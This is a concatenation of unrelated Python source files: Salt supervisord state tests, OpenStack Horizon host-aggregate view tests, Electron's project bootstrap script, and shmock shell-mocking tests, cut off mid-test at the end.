)
break
else:
time.sleep(1)
timeout -= 1
def tearDown(self):
if hasattr(self, "supervisor_proc") and self.supervisor_proc.poll() is not None:
self.run_function(
"supervisord.custom",
["shutdown"],
conf_file=self.supervisor_conf,
bin_env=self.venv_dir,
)
self.supervisor_proc.wait()
del self.supervisor_proc
del self.venv_test_dir
del self.venv_dir
del self.supervisord
del self.supervisor_conf
del self.supervisor_sock
def test_running_stopped(self):
"""
supervisord.running restart = False
When service is stopped.
"""
self.start_supervisord(autostart=False)
ret = self.run_state(
"supervisord.running",
name="sleep_service",
bin_env=self.venv_dir,
conf_file=self.supervisor_conf,
)
self.assertSaltTrueReturn(ret)
self.assertInSaltReturn("sleep_service", ret, ["changes"])
def test_running_started(self):
"""
supervisord.running restart = False
When service is running.
"""
self.start_supervisord(autostart=True)
ret = self.run_state(
"supervisord.running",
name="sleep_service",
bin_env=self.venv_dir,
conf_file=self.supervisor_conf,
)
self.assertSaltTrueReturn(ret)
self.assertNotInSaltReturn("sleep_service", ret, ["changes"])
def test_running_needsupdate(self):
"""
supervisord.running restart = False
When service needs to be added.
"""
self.start_supervisord(autostart=False)
self.run_function(
"supervisord.remove",
["sleep_service", None, self.supervisor_conf, self.venv_dir],
)
ret = self.run_state(
"supervisord.running",
name="sleep_service",
bin_env=self.venv_dir,
conf_file=self.supervisor_conf,
)
self.assertSaltTrueReturn(ret)
self.assertInSaltReturn("sleep_service", ret, ["changes"])
def test_running_notexists(self):
"""
supervisord.running restart = False
When service doesn't exist.
"""
self.start_supervisord(autostart=True)
ret = self.run_state(
"supervisord.running",
name="does_not_exist",
bin_env=self.venv_dir,
conf_file=self.supervisor_conf,
)
self.assertSaltFalseReturn(ret)
def test_restart_started(self):
"""
supervisord.running restart = True
When service is running.
"""
self.start_supervisord(autostart=True)
ret = self.run_state(
"supervisord.running",
name="sleep_service",
restart=True,
bin_env=self.venv_dir,
conf_file=self.supervisor_conf,
)
self.assertSaltTrueReturn(ret)
self.assertInSaltReturn("sleep_service", ret, ["changes"])
def test_restart_stopped(self):
"""
supervisord.running restart = True
When service is stopped.
"""
self.start_supervisord(autostart=False)
ret = self.run_state(
"supervisord.running",
name="sleep_service",
restart=True,
bin_env=self.venv_dir,
conf_file=self.supervisor_conf,
)
self.assertSaltTrueReturn(ret)
self.assertInSaltReturn("sleep_service", ret, ["changes"])
def test_restart_needsupdate(self):
"""
supervisord.running restart = True
When service needs to be added.
"""
self.start_supervisord(autostart=False)
self.run_function(
"supervisord.remove",
["sleep_service", None, self.supervisor_conf, self.venv_dir],
)
ret = self.run_state(
"supervisord.running",
name="sleep_service",
restart=True,
bin_env=self.venv_dir,
conf_file=self.supervisor_conf,
)
self.assertSaltTrueReturn(ret)
self.assertInSaltReturn("sleep_service", ret, ["changes"])
def test_restart_notexists(self):
"""
supervisord.running restart = True
When service does not exist.
"""
self.start_supervisord(autostart=True)
ret = self.run_state(
"supervisord.running",
name="does_not_exist",
restart=True,
bin_env=self.venv_dir,
conf_file=self.supervisor_conf,
)
self.assertSaltFalseReturn(ret)
self.assertNotInSaltReturn("sleep_service", ret, ["changes"])
def test_dead_started(self):
"""
supervisord.dead
When service is running.
"""
self.start_supervisord(autostart=True)
ret = self.run_state(
"supervisord.dead",
name="sleep_service",
bin_env=self.venv_dir,
conf_file=self.supervisor_conf,
)
self.assertSaltTrueReturn(ret)
def test_dead_stopped(self):
"""
supervisord.dead
When service is stopped.
"""
self.start_supervisord(autostart=False)
ret = self.run_state(
"supervisord.dead",
name="sleep_service",
bin_env=self.venv_dir,
conf_file=self.supervisor_conf,
)
self.assertSaltTrueReturn(ret)
def test_dead_removed(self):
"""
supervisord.dead
When service needs to be added.
"""
self.start_supervisord(autostart=False)
self.run_function(
"supervisord.remove",
["sleep_service", None, self.supervisor_conf, self.venv_dir],
)
ret = self.run_state(
"supervisord.dead",
name="sleep_service",
bin_env=self.venv_dir,
conf_file=self.supervisor_conf,
)
self.assertSaltTrueReturn(ret)
def test_dead_notexists(self):
"""
supervisord.dead
When service does not exist.
"""
self.start_supervisord(autostart=True)
ret = self.run_state(
"supervisord.dead",
name="does_not_exist",
bin_env=self.venv_dir,
conf_file=self.supervisor_conf,
)
self.assertSaltTrueReturn(ret)
| |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from django.core.urlresolvers import reverse
from django import http
from mox3.mox import IsA # noqa
from openstack_dashboard import api
from openstack_dashboard.dashboards.admin.aggregates import constants
from openstack_dashboard.dashboards.admin.aggregates import workflows
from openstack_dashboard.test import helpers as test
class BaseAggregateWorkflowTests(test.BaseAdminViewTests):
def _get_create_workflow_data(self, aggregate, hosts=None):
aggregate_info = {"name": aggregate.name,
"availability_zone": aggregate.availability_zone}
if hosts:
compute_hosts = []
for host in hosts:
if host.service == 'compute':
compute_hosts.append(host)
host_field_name = 'add_host_to_aggregate_role_member'
aggregate_info[host_field_name] = \
[h.host_name for h in compute_hosts]
return aggregate_info
def _get_manage_workflow_data(self, aggregate, hosts=None, ):
aggregate_info = {"id": aggregate.id}
if hosts:
compute_hosts = []
for host in hosts:
if host.service == 'compute':
compute_hosts.append(host)
host_field_name = 'add_host_to_aggregate_role_member'
aggregate_info[host_field_name] = \
[h.host_name for h in compute_hosts]
return aggregate_info
class CreateAggregateWorkflowTests(BaseAggregateWorkflowTests):
@test.create_stubs({api.nova: ('host_list', ), })
def test_workflow_get(self):
api.nova.host_list(IsA(http.HttpRequest)).AndReturn(self.hosts.list())
self.mox.ReplayAll()
url = reverse(constants.AGGREGATES_CREATE_URL)
res = self.client.get(url)
workflow = res.context['workflow']
self.assertTemplateUsed(res, constants.AGGREGATES_CREATE_VIEW_TEMPLATE)
self.assertEqual(workflow.name, workflows.CreateAggregateWorkflow.name)
self.assertQuerysetEqual(
workflow.steps,
['<SetAggregateInfoStep: set_aggregate_info>',
'<AddHostsToAggregateStep: add_host_to_aggregate>'])
@test.create_stubs({api.nova: ('host_list', 'aggregate_details_list',
'aggregate_create'), })
def _test_generic_create_aggregate(self, workflow_data, aggregate,
error_count=0,
expected_error_message=None):
api.nova.host_list(IsA(http.HttpRequest)).AndReturn(self.hosts.list())
api.nova.aggregate_details_list(IsA(http.HttpRequest)).AndReturn([])
if not expected_error_message:
api.nova.aggregate_create(
IsA(http.HttpRequest),
name=workflow_data['name'],
availability_zone=workflow_data['availability_zone'],
).AndReturn(aggregate)
self.mox.ReplayAll()
url = reverse(constants.AGGREGATES_CREATE_URL)
res = self.client.post(url, workflow_data)
if not expected_error_message:
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(
res, reverse(constants.AGGREGATES_INDEX_URL))
else:
self.assertFormErrors(res, error_count, expected_error_message)
def test_create_aggregate(self):
aggregate = self.aggregates.first()
workflow_data = self._get_create_workflow_data(aggregate)
self._test_generic_create_aggregate(workflow_data, aggregate)
def test_create_aggregate_fails_missing_fields(self):
aggregate = self.aggregates.first()
workflow_data = self._get_create_workflow_data(aggregate)
workflow_data['name'] = ''
workflow_data['availability_zone'] = ''
self._test_generic_create_aggregate(workflow_data, aggregate, 1,
u'This field is required')
@test.create_stubs({api.nova: ('host_list',
'aggregate_details_list',
'aggregate_create',
'add_host_to_aggregate'), })
def test_create_aggregate_with_hosts(self):
aggregate = self.aggregates.first()
hosts = self.hosts.list()
api.nova.host_list(IsA(http.HttpRequest)).AndReturn(self.hosts.list())
api.nova.aggregate_details_list(IsA(http.HttpRequest)).AndReturn([])
workflow_data = self._get_create_workflow_data(aggregate, hosts)
api.nova.aggregate_create(
IsA(http.HttpRequest),
name=workflow_data['name'],
availability_zone=workflow_data['availability_zone'],
).AndReturn(aggregate)
compute_hosts = []
for host in hosts:
if host.service == 'compute':
compute_hosts.append(host)
for host in compute_hosts:
api.nova.add_host_to_aggregate(
IsA(http.HttpRequest),
aggregate.id, host.host_name).InAnyOrder()
self.mox.ReplayAll()
url = reverse(constants.AGGREGATES_CREATE_URL)
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res,
reverse(constants.AGGREGATES_INDEX_URL))
@test.create_stubs({api.nova: ('host_list', 'aggregate_details_list', ), })
def test_host_list_nova_compute(self):
hosts = self.hosts.list()
compute_hosts = []
for host in hosts:
if host.service == 'compute':
compute_hosts.append(host)
api.nova.host_list(IsA(http.HttpRequest)).AndReturn(self.hosts.list())
self.mox.ReplayAll()
url = reverse(constants.AGGREGATES_CREATE_URL)
res = self.client.get(url)
workflow = res.context['workflow']
step = workflow.get_step("add_host_to_aggregate")
field_name = step.get_member_field_name('member')
self.assertEqual(len(step.action.fields[field_name].choices),
len(compute_hosts))
class AggregatesViewTests(test.BaseAdminViewTests):
@mock.patch('openstack_dashboard.api.nova.extension_supported',
mock.Mock(return_value=False))
@test.create_stubs({api.nova: ('aggregate_details_list',
'availability_zone_list',),
api.cinder: ('tenant_absolute_limits',)})
def test_panel_not_available(self):
api.cinder.tenant_absolute_limits(IsA(http.HttpRequest)). \
MultipleTimes().AndReturn(self.cinder_limits['absolute'])
self.mox.ReplayAll()
self.patchers['aggregates'].stop()
res = self.client.get(reverse('horizon:admin:overview:index'))
self.assertNotIn('Host Aggregates', res.content)
@test.create_stubs({api.nova: ('aggregate_details_list',
'availability_zone_list',)})
def test_index(self):
api.nova.aggregate_details_list(IsA(http.HttpRequest)) \
.AndReturn(self.aggregates.list())
api.nova.availability_zone_list(IsA(http.HttpRequest), detailed=True) \
.AndReturn(self.availability_zones.list())
self.mox.ReplayAll()
res = self.client.get(reverse(constants.AGGREGATES_INDEX_URL))
self.assertTemplateUsed(res, constants.AGGREGATES_INDEX_VIEW_TEMPLATE)
self.assertItemsEqual(res.context['host_aggregates_table'].data,
self.aggregates.list())
self.assertItemsEqual(res.context['availability_zones_table'].data,
self.availability_zones.list())
@test.create_stubs({api.nova: ('aggregate_update', 'aggregate_get',), })
def _test_generic_update_aggregate(self, form_data, aggregate,
error_count=0,
expected_error_message=None):
api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id))\
.AndReturn(aggregate)
if not expected_error_message:
az = form_data['availability_zone']
aggregate_data = {'name': form_data['name'],
'availability_zone': az}
api.nova.aggregate_update(IsA(http.HttpRequest), str(aggregate.id),
aggregate_data)
self.mox.ReplayAll()
res = self.client.post(reverse(constants.AGGREGATES_UPDATE_URL,
args=[aggregate.id]),
form_data)
if not expected_error_message:
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(
res, reverse(constants.AGGREGATES_INDEX_URL))
else:
self.assertFormErrors(res, error_count, expected_error_message)
def test_update_aggregate(self):
aggregate = self.aggregates.first()
form_data = {'id': aggregate.id,
'name': 'my_new_name',
'availability_zone': 'my_new_zone'}
self._test_generic_update_aggregate(form_data, aggregate)
def test_update_aggregate_fails_missing_fields(self):
aggregate = self.aggregates.first()
form_data = {'id': aggregate.id}
self._test_generic_update_aggregate(form_data, aggregate, 1,
u'This field is required')
class ManageHostsTests(test.BaseAdminViewTests):
@test.create_stubs({api.nova: ('aggregate_get', 'host_list')})
def test_manage_hosts(self):
aggregate = self.aggregates.first()
api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
.AndReturn(aggregate)
api.nova.host_list(IsA(http.HttpRequest)) \
.AndReturn(self.hosts.list())
self.mox.ReplayAll()
res = self.client.get(reverse(constants.AGGREGATES_MANAGE_HOSTS_URL,
args=[aggregate.id]))
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res,
constants.AGGREGATES_MANAGE_HOSTS_TEMPLATE)
@test.create_stubs({api.nova: ('aggregate_get', 'add_host_to_aggregate',
'remove_host_from_aggregate',
'host_list')})
def test_manage_hosts_update_add_remove_not_empty_aggregate(self):
aggregate = self.aggregates.first()
aggregate.hosts = ['host1', 'host2']
host = self.hosts.list()[0]
form_data = {'manageaggregatehostsaction_role_member':
[host.host_name]}
api.nova.remove_host_from_aggregate(IsA(http.HttpRequest),
str(aggregate.id),
'host2').InAnyOrder()
api.nova.remove_host_from_aggregate(IsA(http.HttpRequest),
str(aggregate.id),
'host1').InAnyOrder()
api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
.AndReturn(aggregate)
api.nova.host_list(IsA(http.HttpRequest)) \
.AndReturn(self.hosts.list())
api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
.AndReturn(aggregate)
api.nova.add_host_to_aggregate(IsA(http.HttpRequest),
str(aggregate.id), host.host_name)
self.mox.ReplayAll()
res = self.client.post(reverse(constants.AGGREGATES_MANAGE_HOSTS_URL,
args=[aggregate.id]),
form_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res,
reverse(constants.AGGREGATES_INDEX_URL))
@test.create_stubs({api.nova: ('aggregate_get', 'add_host_to_aggregate',
'remove_host_from_aggregate',
'host_list')})
def test_manage_hosts_update_add_not_empty_aggregate_should_fail(self):
aggregate = self.aggregates.first()
aggregate.hosts = ['devstack001']
host1 = self.hosts.list()[0]
host3 = self.hosts.list()[2]
form_data = {'manageaggregatehostsaction_role_member':
[host1.host_name, host3.host_name]}
api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
.InAnyOrder().AndReturn(aggregate)
api.nova.host_list(IsA(http.HttpRequest)) \
.InAnyOrder().AndReturn(self.hosts.list())
api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
.InAnyOrder().AndReturn(aggregate)
api.nova.add_host_to_aggregate(IsA(http.HttpRequest),
str(aggregate.id), host3.host_name) \
.InAnyOrder().AndRaise(self.exceptions.nova)
self.mox.ReplayAll()
res = self.client.post(reverse(constants.AGGREGATES_MANAGE_HOSTS_URL,
args=[aggregate.id]),
form_data)
self.assertNoFormErrors(res)
self.assertMessageCount(error=2)
self.assertRedirectsNoFollow(res,
reverse(constants.AGGREGATES_INDEX_URL))
@test.create_stubs({api.nova: ('aggregate_get', 'add_host_to_aggregate',
'remove_host_from_aggregate',
'host_list')})
def test_manage_hosts_update_clean_not_empty_aggregate_should_fail(self):
aggregate = self.aggregates.first()
aggregate.hosts = ['host2']
form_data = {'manageaggregatehostsaction_role_member':
[]}
api.nova.remove_host_from_aggregate(IsA(http.HttpRequest),
str(aggregate.id),
'host2')\
.AndRaise(self.exceptions.nova)
api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
.AndReturn(aggregate)
api.nova.host_list(IsA(http.HttpRequest)) \
.AndReturn(self.hosts.list())
api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
.AndReturn(aggregate)
self.mox.ReplayAll()
res = self.client.post(reverse(constants.AGGREGATES_MANAGE_HOSTS_URL,
args=[aggregate.id]),
form_data)
self.assertNoFormErrors(res)
self.assertMessageCount(error=2)
self.assertRedirectsNoFollow(res,
reverse(constants.AGGREGATES_INDEX_URL))
@test.create_stubs({api.nova: ('aggregate_get', 'add_host_to_aggregate',
'remove_host_from_aggregate',
'host_list')})
def _test_manage_hosts_update(self,
host,
aggregate,
form_data,
addAggregate=False,
cleanAggregates=False):
if cleanAggregates:
api.nova.remove_host_from_aggregate(IsA(http.HttpRequest),
str(aggregate.id),
'host3').InAnyOrder()
api.nova.remove_host_from_aggregate(IsA(http.HttpRequest),
str(aggregate.id),
'host2').InAnyOrder()
api.nova.remove_host_from_aggregate(IsA(http.HttpRequest),
str(aggregate.id),
'host1').InAnyOrder()
api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
.AndReturn(aggregate)
api.nova.host_list(IsA(http.HttpRequest)) \
.AndReturn(self.hosts.list())
api.nova.aggregate_get(IsA(http.HttpRequest), str(aggregate.id)) \
.AndReturn(aggregate)
if addAggregate:
api.nova.add_host_to_aggregate(IsA(http.HttpRequest),
str(aggregate.id),
host.host_name)
self.mox.ReplayAll()
res = self.client.post(reverse(constants.AGGREGATES_MANAGE_HOSTS_URL,
args=[aggregate.id]),
form_data)
self.assertNoFormErrors(res)
self.assertRedirectsNoFollow(res,
reverse(constants.AGGREGATES_INDEX_URL))
def test_manage_hosts_update_nothing_not_empty_aggregate(self):
aggregate = self.aggregates.first()
host = self.hosts.list()[0]
aggregate.hosts = [host.host_name]
form_data = {'manageaggregatehostsaction_role_member':
[host.host_name]}
self._test_manage_hosts_update(host,
aggregate,
form_data,
addAggregate=False)
def test_manage_hosts_update_nothing_empty_aggregate(self):
aggregate = self.aggregates.first()
aggregate.hosts = []
form_data = {'manageaggregatehostsaction_role_member':
[]}
self._test_manage_hosts_update(None,
aggregate,
form_data,
addAggregate=False)
def test_manage_hosts_update_add_empty_aggregate(self):
aggregate = self.aggregates.first()
aggregate.hosts = []
host = self.hosts.list()[0]
form_data = {'manageaggregatehostsaction_role_member':
[host.host_name]}
self._test_manage_hosts_update(host,
aggregate,
form_data,
addAggregate=True)
def test_manage_hosts_update_add_not_empty_aggregate(self):
aggregate = self.aggregates.first()
aggregate.hosts = ['devstack001']
host1 = self.hosts.list()[0]
host3 = self.hosts.list()[2]
form_data = {'manageaggregatehostsaction_role_member':
[host1.host_name, host3.host_name]}
self._test_manage_hosts_update(host3,
aggregate,
form_data,
addAggregate=True)
def test_manage_hosts_update_clean_not_empty_aggregate(self):
aggregate = self.aggregates.first()
aggregate.hosts = ['host1', 'host2', 'host3']
form_data = {'manageaggregatehostsaction_role_member':
[]}
self._test_manage_hosts_update(None,
aggregate,
form_data,
addAggregate=False,
cleanAggregates=True)
| |
#!/usr/bin/env python
import argparse
import os
import subprocess
import sys
from lib.config import LIBCHROMIUMCONTENT_COMMIT, BASE_URL, PLATFORM, \
enable_verbose_mode, is_verbose_mode, get_target_arch
from lib.util import execute_stdout, get_atom_shell_version, scoped_cwd
SOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
VENDOR_DIR = os.path.join(SOURCE_ROOT, 'vendor')
PYTHON_26_URL = 'https://chromium.googlesource.com/chromium/deps/python_26'
if os.environ.has_key('CI'):
NPM = os.path.join(SOURCE_ROOT, 'node_modules', '.bin', 'npm')
else:
NPM = 'npm'
if sys.platform in ['win32', 'cygwin']:
NPM += '.cmd'
def main():
os.chdir(SOURCE_ROOT)
args = parse_args()
defines = args_to_defines(args)
if not args.yes and PLATFORM != 'win32':
check_root()
if args.verbose:
enable_verbose_mode()
if sys.platform == 'cygwin':
update_win32_python()
update_submodules()
libcc_source_path = args.libcc_source_path
libcc_shared_library_path = args.libcc_shared_library_path
libcc_static_library_path = args.libcc_static_library_path
# Redirect to use local libchromiumcontent build.
if args.build_libchromiumcontent:
build_libchromiumcontent(args.verbose, args.target_arch, defines)
dist_dir = os.path.join(SOURCE_ROOT, 'vendor', 'brightray', 'vendor',
'libchromiumcontent', 'dist', 'main')
libcc_source_path = os.path.join(dist_dir, 'src')
libcc_shared_library_path = os.path.join(dist_dir, 'shared_library')
libcc_static_library_path = os.path.join(dist_dir, 'static_library')
if PLATFORM != 'win32':
# Download prebuilt clang binaries.
update_clang()
setup_python_libs()
update_node_modules('.')
bootstrap_brightray(args.dev, args.url, args.target_arch,
libcc_source_path, libcc_shared_library_path,
libcc_static_library_path)
if PLATFORM == 'linux':
download_sysroot(args.target_arch)
create_chrome_version_h()
touch_config_gypi()
run_update(defines, args.disable_clang, args.clang_dir)
update_electron_modules('spec', args.target_arch)
def parse_args():
parser = argparse.ArgumentParser(description='Bootstrap this project')
parser.add_argument('-u', '--url',
help='The base URL from which to download '
'libchromiumcontent (i.e., the URL you passed to '
'libchromiumcontent\'s script/upload script',
default=BASE_URL,
required=False)
parser.add_argument('-v', '--verbose',
action='store_true',
help='Prints the output of the subprocesses')
parser.add_argument('-d', '--dev', action='store_true',
help='Do not download static_library build')
parser.add_argument('-y', '--yes', '--assume-yes',
action='store_true',
help='Run non-interactively by assuming "yes" to all ' \
'prompts.')
parser.add_argument('--target_arch', default=get_target_arch(),
help='Manually specify the arch to build for')
parser.add_argument('--clang_dir', default='', help='Path to clang binaries')
parser.add_argument('--disable_clang', action='store_true',
help='Use compilers other than clang for building')
parser.add_argument('--build_libchromiumcontent', action='store_true',
help='Build local version of libchromiumcontent')
parser.add_argument('--libcc_source_path', required=False,
help='The source path of libchromiumcontent. ' \
'NOTE: All options of libchromiumcontent are ' \
'required OR let electron choose it')
parser.add_argument('--libcc_shared_library_path', required=False,
help='The shared library path of libchromiumcontent.')
parser.add_argument('--libcc_static_library_path', required=False,
help='The static library path of libchromiumcontent.')
return parser.parse_args()
def args_to_defines(args):
defines = ''
if args.disable_clang:
defines += ' clang=0'
if args.clang_dir:
defines += ' make_clang_dir=' + args.clang_dir
defines += ' clang_use_chrome_plugins=0'
return defines
def check_root():
if os.geteuid() == 0:
print "We suggest not running this as root, unless you're really sure."
choice = raw_input("Do you want to continue? [y/N]: ")
if choice not in ('y', 'Y'):
sys.exit(0)
def update_submodules():
execute_stdout(['git', 'submodule', 'sync', '--recursive'])
execute_stdout(['git', 'submodule', 'update', '--init', '--recursive'])
def setup_python_libs():
for lib in ('requests', 'boto'):
with scoped_cwd(os.path.join(VENDOR_DIR, lib)):
execute_stdout([sys.executable, 'setup.py', 'build'])
def bootstrap_brightray(is_dev, url, target_arch, libcc_source_path,
libcc_shared_library_path,
libcc_static_library_path):
bootstrap = os.path.join(VENDOR_DIR, 'brightray', 'script', 'bootstrap')
args = [
'--commit', LIBCHROMIUMCONTENT_COMMIT,
'--target_arch', target_arch,
url
]
if is_dev:
args = ['--dev'] + args
if (libcc_source_path != None and
libcc_shared_library_path != None and
libcc_static_library_path != None):
args += ['--libcc_source_path', libcc_source_path,
'--libcc_shared_library_path', libcc_shared_library_path,
'--libcc_static_library_path', libcc_static_library_path]
execute_stdout([sys.executable, bootstrap] + args)
def set_clang_env(env):
llvm_dir = os.path.join(SOURCE_ROOT, 'vendor', 'llvm-build',
'Release+Asserts', 'bin')
env['CC'] = os.path.join(llvm_dir, 'clang')
env['CXX'] = os.path.join(llvm_dir, 'clang++')
def update_node_modules(dirname, env=None):
if env is None:
env = os.environ.copy()
if PLATFORM == 'linux':
# Use prebuilt clang for building native modules.
set_clang_env(env)
env['npm_config_clang'] = '1'
with scoped_cwd(dirname):
args = [NPM, 'install']
if is_verbose_mode():
args += ['--verbose']
# Ignore npm install errors when running in CI.
if os.environ.has_key('CI'):
try:
execute_stdout(args, env)
except subprocess.CalledProcessError:
pass
else:
execute_stdout(args, env)
def update_electron_modules(dirname, target_arch):
env = os.environ.copy()
env['npm_config_arch'] = target_arch
env['npm_config_target'] = get_atom_shell_version()
env['npm_config_disturl'] = 'https://atom.io/download/atom-shell'
update_node_modules(dirname, env)
def update_win32_python():
with scoped_cwd(VENDOR_DIR):
if not os.path.exists('python_26'):
execute_stdout(['git', 'clone', PYTHON_26_URL])
def build_libchromiumcontent(verbose, target_arch, defines):
args = [os.path.join(SOURCE_ROOT, 'script', 'build-libchromiumcontent.py')]
if verbose:
args += ['-v']
if defines:
args += ['--defines', defines]
execute_stdout(args + ['--target_arch', target_arch])
def update_clang():
execute_stdout([os.path.join(SOURCE_ROOT, 'script', 'update-clang.sh')])
def download_sysroot(target_arch):
if target_arch == 'ia32':
target_arch = 'i386'
if target_arch == 'x64':
target_arch = 'amd64'
execute_stdout([sys.executable,
os.path.join(SOURCE_ROOT, 'script', 'install-sysroot.py'),
'--arch', target_arch])
def create_chrome_version_h():
version_file = os.path.join(SOURCE_ROOT, 'vendor', 'brightray', 'vendor',
'libchromiumcontent', 'VERSION')
target_file = os.path.join(SOURCE_ROOT, 'atom', 'common', 'chrome_version.h')
template_file = os.path.join(SOURCE_ROOT, 'script', 'chrome_version.h.in')
with open(version_file, 'r') as f:
version = f.read()
with open(template_file, 'r') as f:
template = f.read()
content = template.replace('{PLACEHOLDER}', version.strip())
# We update the file only if the content has changed (ignoring line ending
# differences).
should_write = True
if os.path.isfile(target_file):
with open(target_file, 'r') as f:
should_write = f.read().replace('r', '') != content.replace('r', '')
if should_write:
with open(target_file, 'w') as f:
f.write(content)
def touch_config_gypi():
config_gypi = os.path.join(SOURCE_ROOT, 'vendor', 'node', 'config.gypi')
with open(config_gypi, 'w+') as f:
content = "\n{'variables':{}}"
if f.read() != content:
f.write(content)
def run_update(defines, disable_clang, clang_dir):
env = os.environ.copy()
if not disable_clang and clang_dir == '':
# Build with prebuilt clang.
set_clang_env(env)
update = os.path.join(SOURCE_ROOT, 'script', 'update.py')
execute_stdout([sys.executable, update, '--defines', defines], env)
if __name__ == '__main__':
sys.exit(main())
| |
from __future__ import print_function, absolute_import, unicode_literals, division
import six
import subprocess
import unittest2
from mock import patch
from shmock import ShellCommandMock
def call(args):
process = subprocess.Popen(args,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout_data, stderr_data = process.communicate()
exit_code = process.returncode
return stdout_data, stderr_data, exit_code
class ShmockTest(unittest2.TestCase):
def test_empty_config(self):
commands_to_mock = {}
with ShellCommandMock(commands_to_mock):
pass
def test_string_config(self):
"""Regardless of parameters, saynay must always do the same thing"""
commands_to_mock = {'saynay': 'Nay sayers say nay.'}
with ShellCommandMock(commands_to_mock):
for extra_args in ([], ['foo'], ['foo', '--bar']):
args = ['saynay']
args.extend(extra_args)
out, err, code = call(args)
self.assertEqual(out, b"Nay sayers say nay.\n")
self.assertEqual(err, b"")
self.assertEqual(code, 0)
def test_replace_existing_commands(self):
"""Mocked commands must replace existing commands"""
commands_to_mock = {
'grep': 'I am fake',
'bash': 'I am fake',
'id': 'I am fake'}
with ShellCommandMock(commands_to_mock):
for command in ('grep', 'bash', 'id'):
out, err, code = call([command])
self.assertEqual(out, b"I am fake\n")
self.assertEqual(err, b"")
self.assertEqual(code, 0)
def test_dont_replace_unmocked_commands(self):
"""commands that were not mocked must remain unchanged"""
commands_to_mock = {'foo': 'bar'}
with ShellCommandMock(commands_to_mock):
out, err, code = call(['true'])
self.assertEqual(out, b"")
self.assertEqual(err, b"")
self.assertEqual(code, 0)
out, err, code = call(['false'])
self.assertEqual(out, b"")
self.assertEqual(err, b"")
self.assertNotEqual(code, 0)
def test_no_params(self):
"""Mocking no params must work"""
commands_to_mock = {
'foo': {
(): "I have no parameters"
}
}
with ShellCommandMock(commands_to_mock):
out, err, code = call(['foo'])
self.assertEqual(out, b"I have no parameters\n")
self.assertEqual(err, b"")
self.assertEqual(code, 0)
def test_string_params(self):
"""Mock params provided as strings must work"""
commands_to_mock = {
'foo': {
'param1': 'foo',
'param2': 'bar',
}
}
with ShellCommandMock(commands_to_mock):
out, err, code = call(['foo', 'param1'])
self.assertEqual(out, b"foo\n")
self.assertEqual(err, b"")
self.assertEqual(code, 0)
out, err, code = call(['foo', 'param2'])
self.assertEqual(out, b"bar\n")
self.assertEqual(err, b"")
self.assertEqual(code, 0)
out, err, code = call(['foo', 'param3'])
self.assertNotEqual(out, b"")
self.assertNotEqual(err, b"")
self.assertNotEqual(code, 0)
def test_tuple_params(self):
"""Mock params provided as tuples must work"""
commands_to_mock = {
'foo': {
('param1', 'x'): 'foo',
('param2', 'y'): 'bar',
}
}
with ShellCommandMock(commands_to_mock):
out, err, code = call(['foo', 'param1', 'x'])
self.assertEqual(out, b"foo\n")
self.assertEqual(err, b"")
self.assertEqual(code, 0)
out, err, code = call(['foo', 'param2', 'y'])
self.assertEqual(out, b"bar\n")
self.assertEqual(err, b"")
self.assertEqual(code, 0)
out, err, code = call(['foo', 'param3', 'z'])
self.assertNotEqual(out, b"")
self.assertNotEqual(err, b"")
self.assertNotEqual(code, 0)
def test_partial_dict_behavior(self):
"""Behavior specified as dict must apply defaults when incomplete"""
commands_to_mock = {
'foo': {'x': {'stdout': "xxx"}},
'bar': {'y': {'stderr': "yyy"}},
'batz': {'z': {'returncode': 42}}
}
with ShellCommandMock(commands_to_mock):
out, err, code = call(['foo', 'x'])
self.assertEqual(out, b"xxx\n")
self.assertEqual(err, b"")
self.assertEqual(code, 0)
out, err, code = call(['bar', 'y'])
self.assertEqual(out, b"")
self.assertEqual(err, b"yyy\n")
self.assertEqual(code, 0)
out, err, code = call(['batz', 'z'])
self.assertEqual(out, b"")
self.assertEqual(err, b"")
self.assertEqual(code, 42)
def test_full_dict_behavior(self):
"""Behavior completely specified as dict must work"""
commands_to_mock = {
'foo': {'x': {'stdout': "xxx", 'stderr': "yyy", 'returncode': 42}}}
with ShellCommandMock(commands_to_mock):
out, err, code = call(['foo', 'x'])
self.assertEqual(out, b"xxx\n")
self.assertEqual(err, b"yyy\n")
self.assertEqual(code, 42)
def test_default_behavior(self):
"""Behavior for None must become the default"""
commands_to_mock = {
'foo': {
'x': "hello world",
None: "default"
}
}
with ShellCommandMock(commands_to_mock):
out, err, code = call(['foo', 'x'])
self.assertEqual(out, b"hello world\n")
self.assertEqual(err, b"")
self.assertEqual(code, 0)
out, err, code = call(['foo', 'what', 'ever'])
self.assertEqual(out, b"default\n")
self.assertEqual(err, b"")
self.assertEqual(code, 0)
out, err, code = call(['foo'])
self.assertEqual(out, b"default\n")
self.assertEqual(err, b"")
self.assertEqual(code, 0)
@patch("six.moves.builtins.print")
def test_keep_temp_dir(self, mock_print):
"""keep_temp_dir=True must preserve the mock files on disc
Also, it must print the location of the temporary directory.
"""
commands_to_mock = {
'foo': 'bar'
}
import os
import shutil
with ShellCommandMock(commands_to_mock, keep_temp_dir=True) as shmocker:
mock_dir = shmocker.temp_dir
try:
printed = "\n".join([x[0][0] for x in mock_print.call_args_list])
self.assertIn(mock_dir, printed)
